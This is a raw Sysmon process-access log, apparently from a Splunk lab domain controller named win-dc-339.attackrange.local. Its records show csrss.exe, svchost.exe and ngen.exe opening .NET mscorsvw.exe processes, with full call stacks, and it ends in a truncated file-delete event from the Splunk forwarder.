10341000x800000000000000079953Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.910{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC15-607E-520E-00000000BB01}1144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079952Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.910{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC15-607E-520E-00000000BB01}1144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079951Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.871{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC15-607E-510E-00000000BB01}6800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079950Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.856{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC15-607E-510E-00000000BB01}6800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079949Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.856{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC15-607E-510E-00000000BB01}6800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079948Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.836{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC15-607E-500E-00000000BB01}436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079947Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.826{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC15-607E-500E-00000000BB01}436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079946Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.826{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC15-607E-500E-00000000BB01}436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079945Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.566{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC15-607E-4F0E-00000000BB01}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079944Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.556{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC15-607E-4F0E-00000000BB01}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079943Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.556{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC15-607E-4F0E-00000000BB01}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079942Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.510{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC15-607E-4E0E-00000000BB01}6468C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079941Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.510{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC15-607E-4E0E-00000000BB01}6468C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079940Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.510{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC15-607E-4E0E-00000000BB01}6468C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079939Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.456{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC15-607E-4D0E-00000000BB01}4232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079938Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.446{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC15-607E-4D0E-00000000BB01}4232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079937Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.446{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC15-607E-4D0E-00000000BB01}4232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079936Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.386{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC15-607E-4C0E-00000000BB01}4812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079935Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.376{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC15-607E-4C0E-00000000BB01}4812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079934Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.376{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC15-607E-4C0E-00000000BB01}4812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079933Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.210{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC15-607E-4B0E-00000000BB01}6532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079932Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.199{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC15-607E-4B0E-00000000BB01}6532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079931Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.198{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC15-607E-4B0E-00000000BB01}6532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000079930Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:29.105{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 